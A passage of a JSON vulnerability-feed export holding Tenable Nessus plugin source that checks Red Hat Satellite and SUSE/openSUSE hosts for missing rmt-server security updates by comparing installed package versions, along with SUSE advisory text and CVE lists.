{'reference':'tfm-rubygem-sexp_processor-4.10.0-5.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-sidekiq-5.2.7-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-signet-0.14.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-sinatra-2.0.3-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-smart_proxy_ansible-3.0.1-6.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-smart_proxy_discovery-1.0.5-6.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-smart_proxy_discovery_image-1.3.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-smart_proxy_dns_infoblox-1.1.0-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-smart_proxy_dynflow-0.3.0-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-smart_proxy_dynflow_core-0.3.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-smart_proxy_openscap-0.7.4-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-smart_proxy_pulp-2.1.0-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-smart_proxy_remote_execution_ssh-0.3.1-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-sprockets-4.0.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-sprockets-rails-3.2.1-6.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-sqlite3-1.3.13-5.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-sshkey-1.9.0-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-statsd-instrument-2.1.4-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-stomp-1.4.9-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-text-1.3.0-7.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-thor-1.0.1-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-thread_safe-0.3.6-5.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-tilt-2.0.8-4.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-timeliness-0.3.10-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-tzinfo-1.2.6-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-uber-0.1.0-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-unf-0.1.3-7.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-unf_ext-0.0.7.2-1.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-unicode-0.4.4.4-1.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-unicode-display_width-1.0.5-5.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-validates_lengths_from_database-0.5.0-7.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-webpack-rails-0.9.8-6.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-websocket-driver-0.7.1-1.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-websocket-extensions-0.1.5-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-will_paginate-3.1.7-3.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-xmlrpc-0.3.0-2.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-rubygem-zeitwerk-2.2.2-1.el7sat', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'},\n {'reference':'tfm-runtime-6.1-4.el7sat', 'cpu':'x86_64', 'release':'7', 'el_string':'el7sat', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'satellite-6'}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ansible-collection-redhat-satellite / ansible-runner / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:30", "description": "This update for rmt-server fixes the following issues :\n\nUpdate to version 2.6.5: Solved potential bug of SCC repository URLs changing over time. RMT now self heals by removing the previous invalid repository and creating the correct one.\n\nAdd web server settings to /etc/rmt.conf: Now it's possible to configure the minimum and maximum threads count as well the number of web server workers to be booted through /etc/rmt.conf.\n\nInstead of using an MD5 of URLs for custom repository friendly_ids, RMT now builds an ID from the name.\n\nFix RMT file caching based on timestamps: Previously, RMT sent GET requests with the header 'If-Modified-Since' to a repository server and if the response had a 304 (Not Modified), it would copy a file from the local cache instead of downloading. However, if the local file timestamp accidentally changed to a date newer than the one on the repository server, RMT would have an outdated file, which caused some errors. Now, RMT makes HEAD requests to the repositories servers and inspect the 'Last-Modified' header to decide whether to download a file or copy it from cache, by comparing the equalness of timestamps.\n\nFixed an issue where relative paths supplied to `rmt-cli import repos` caused the command to fail.\n\nFriendlier IDs for custom repositories: In an effort to simplify the handling of SCC and custom repositories, RMT now has friendly IDs. For SCC repositories, it's the same SCC ID as before. For custom repositories, it can either be user provided or RMT generated (MD5 of the provided URL). Benefits :\n\n - `rmt-cli mirror repositories` now works for custom repositories.\n\n - Custom repository IDs can be the same across RMT instances.\n\n - No more confusing 'SCC ID' vs 'ID' in `rmt-cli` output.\n Deprecation Warnings :\n\n - RMT now uses a different ID for custom repositories than before. RMT still supports that old ID, but it's recommended to start using the new ID to ensure future compatibility.\n\nUpdated rails and puma dependencies for security fixes.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : rmt-server (SUSE-SU-2020:3036-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16770", "CVE-2019-5418", "CVE-2019-5419", "CVE-2019-5420", "CVE-2020-11076", "CVE-2020-11077", "CVE-2020-15169", "CVE-2020-5247", "CVE-2020-5249", "CVE-2020-5267", "CVE-2020-8164", "CVE-2020-8165", "CVE-2020-8166", "CVE-2020-8167", "CVE-2020-8184", "CVE-2020-8185"], "modified": "2020-12-17T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:rmt-server", "p-cpe:/a:novell:suse_linux:rmt-server-config", "p-cpe:/a:novell:suse_linux:rmt-server-debuginfo", "p-cpe:/a:novell:suse_linux:rmt-server-debugsource", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-3036-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143751", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:3036-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143751);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/17\");\n\n script_cve_id(\"CVE-2019-16770\", \"CVE-2019-5418\", \"CVE-2019-5419\", \"CVE-2019-5420\", \"CVE-2020-11076\", \"CVE-2020-11077\", \"CVE-2020-15169\", \"CVE-2020-5247\", \"CVE-2020-5249\", \"CVE-2020-5267\", \"CVE-2020-8164\", \"CVE-2020-8165\", \"CVE-2020-8166\", \"CVE-2020-8167\", \"CVE-2020-8184\", \"CVE-2020-8185\");\n\n script_name(english:\"SUSE SLES15 Security Update : rmt-server (SUSE-SU-2020:3036-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for rmt-server fixes the following issues :\n\nUpdate to version 2.6.5: Solved potential bug of SCC repository URLs\nchanging over time. RMT now self heals by removing the previous\ninvalid repository and creating the correct one.\n\nAdd web server settings to /etc/rmt.conf: Now it's possible to\nconfigure the minimum and maximum threads count as well the number of\nweb server workers to be booted through /etc/rmt.conf.\n\nInstead of using an MD5 of URLs for custom repository friendly_ids,\nRMT now builds an ID from the name.\n\nFix RMT file caching based on timestamps: Previously, RMT sent GET\nrequests with the header 'If-Modified-Since' to a repository server\nand if the response had a 304 (Not Modified), it would copy a file\nfrom the local cache instead of downloading. However, if the local\nfile timestamp accidentally changed to a date newer than the one on\nthe repository server, RMT would have an outdated file, which caused\nsome errors. Now, RMT makes HEAD requests to the repositories servers\nand inspect the 'Last-Modified' header to decide whether to download a\nfile or copy it from cache, by comparing the equalness of timestamps.\n\nFixed an issue where relative paths supplied to `rmt-cli import repos`\ncaused the command to fail.\n\nFriendlier IDs for custom repositories: In an effort to simplify the\nhandling of SCC and custom repositories, RMT now has friendly IDs. For\nSCC repositories, it's the same SCC ID as before. For custom\nrepositories, it can either be user provided or RMT generated (MD5 of\nthe provided URL). Benefits :\n\n - `rmt-cli mirror repositories` now works for custom\n repositories.\n\n - Custom repository IDs can be the same across RMT\n instances.\n\n - No more confusing 'SCC ID' vs 'ID' in `rmt-cli` output.\n Deprecation Warnings :\n\n - RMT now uses a different ID for custom repositories than\n before. RMT still supports that old ID, but it's\n recommended to start using the new ID to ensure future\n compatibility.\n\nUpdated rails and puma dependencies for security fixes.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1165548\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1168554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1173351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-16770/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-5418/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-5419/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-5420/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11076/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11077/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-15169/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-5247/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-5249/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-5267/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8164/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8165/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8166/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8167/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-8185/\"\n );\n # https://www.suse.com/support/update/announcement/2020/suse-su-20203036-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?08477350\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Server Applications 15-SP2 :\n\nzypper in -t patch\nSUSE-SLE-Module-Server-Applications-15-SP2-2020-3036=1\n\nSUSE Linux Enterprise Module for Public Cloud 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-15-SP2-2020-3036=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8165\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Rails File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby On Rails DoubleTap Development Mode secret_key_base Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rmt-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rmt-server-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rmt-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rmt-server-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"rmt-server-2.6.5-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"rmt-server-config-2.6.5-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"rmt-server-debuginfo-2.6.5-3.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"rmt-server-debugsource-2.6.5-3.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rmt-server\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:25", "description": "This update for rmt-server fixes the following issues :\n\nUpdate to version 2.6.5 :\n\n - Solved potential bug of SCC repository URLs changing over time. RMT now self heals by removing the previous invalid repository and creating the correct one.\n\n - Add web server settings to /etc/rmt.conf: Now it's possible to configure the minimum and maximum threads count as well the number of web server workers to be booted through /etc/rmt.conf.\n\n - Instead of using an MD5 of URLs for custom repository friendly_ids, RMT now builds an ID from the name.\n\n - Fix RMT file caching based on timestamps: Previously, RMT sent GET requests with the header 'If-Modified-Since' to a repository server and if the response had a 304 (Not Modified), it would copy a file from the local cache instead of downloading. However, if the local file timestamp accidentally changed to a date newer than the one on the repository server, RMT would have an outdated file, which caused some errors. Now, RMT makes HEAD requests to the repositories servers and inspect the 'Last-Modified' header to decide whether to download a file or copy it from cache, by comparing the equalness of timestamps.\n\n - Fixed an issue where relative paths supplied to `rmt-cli import repos` caused the command to fail.\n\n - Friendlier IDs for custom repositories: In an effort to simplify the handling of SCC and custom repositories, RMT now has friendly IDs. For SCC repositories, it's the same SCC ID as before. For custom repositories, it can either be user provided or RMT generated (MD5 of the provided URL). Benefits :\n\n - `rmt-cli mirror repositories` now works for custom repositories.\n\n - Custom repository IDs can be the same across RMT instances.\n\n - No more confusing 'SCC ID' vs 'ID' in `rmt-cli` output.\n Deprecation Warnings :\n\n - RMT now uses a different ID for custom repositories than before. RMT still supports that old ID, but it's recommended to start using the new ID to ensure future compatibility.\n\n - Updated rails and puma dependencies for security fixes.\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update project.", "cvss3": {}, "published": "2020-11-23T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rmt-server (openSUSE-2020-1993)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16770", "CVE-2019-5418", "CVE-2019-5419", "CVE-2019-5420", "CVE-2020-11076", "CVE-2020-11077", "CVE-2020-15169", "CVE-2020-5247", "CVE-2020-5249", "CVE-2020-5267", "CVE-2020-8164", "CVE-2020-8165", "CVE-2020-8166", "CVE-2020-8167", "CVE-2020-8184", "CVE-2020-8185"], "modified": "2020-12-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:rmt-server", "p-cpe:/a:novell:opensuse:rmt-server-config", "p-cpe:/a:novell:opensuse:rmt-server-debuginfo", "p-cpe:/a:novell:opensuse:rmt-server-debugsource", "p-cpe:/a:novell:opensuse:rmt-server-pubcloud", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2020-1993.NASL", "href": "https://www.tenable.com/plugins/nessus/143190", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1993.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143190);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/17\");\n\n script_cve_id(\"CVE-2019-16770\", \"CVE-2019-5418\", \"CVE-2019-5419\", \"CVE-2019-5420\", \"CVE-2020-11076\", \"CVE-2020-11077\", \"CVE-2020-15169\", \"CVE-2020-5247\", \"CVE-2020-5249\", \"CVE-2020-5267\", \"CVE-2020-8164\", \"CVE-2020-8165\", \"CVE-2020-8166\", \"CVE-2020-8167\", \"CVE-2020-8184\", \"CVE-2020-8185\");\n\n script_name(english:\"openSUSE Security Update : rmt-server (openSUSE-2020-1993)\");\n script_summary(english:\"Check for the openSUSE-2020-1993 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for rmt-server fixes the following issues :\n\nUpdate to version 2.6.5 :\n\n - Solved potential bug of SCC repository URLs changing\n over time. RMT now self heals by removing the previous\n invalid repository and creating the correct one.\n\n - Add web server settings to /etc/rmt.conf: Now it's\n possible to configure the minimum and maximum threads\n count as well the number of web server workers to be\n booted through /etc/rmt.conf.\n\n - Instead of using an MD5 of URLs for custom repository\n friendly_ids, RMT now builds an ID from the name.\n\n - Fix RMT file caching based on timestamps: Previously,\n RMT sent GET requests with the header\n 'If-Modified-Since' to a repository server and if the\n response had a 304 (Not Modified), it would copy a file\n from the local cache instead of downloading. However, if\n the local file timestamp accidentally changed to a date\n newer than the one on the repository server, RMT would\n have an outdated file, which caused some errors. Now,\n RMT makes HEAD requests to the repositories servers and\n inspect the 'Last-Modified' header to decide whether to\n download a file or copy it from cache, by comparing the\n equalness of timestamps.\n\n - Fixed an issue where relative paths supplied to `rmt-cli\n import repos` caused the command to fail.\n\n - Friendlier IDs for custom repositories: In an effort to\n simplify the handling of SCC and custom repositories,\n RMT now has friendly IDs. For SCC repositories, it's the\n same SCC ID as before. For custom repositories, it can\n either be user provided or RMT generated (MD5 of the\n provided URL). Benefits :\n\n - `rmt-cli mirror repositories` now works for custom\n repositories.\n\n - Custom repository IDs can be the same across RMT\n instances.\n\n - No more confusing 'SCC ID' vs 'ID' in `rmt-cli` output.\n Deprecation Warnings :\n\n - RMT now uses a different ID for custom repositories than\n before. RMT still supports that old ID, but it's\n recommended to start using the new ID to ensure future\n compatibility.\n\n - Updated rails and puma dependencies for security fixes.\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1165548\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1168554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173351\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected rmt-server packages.\"\n );\n 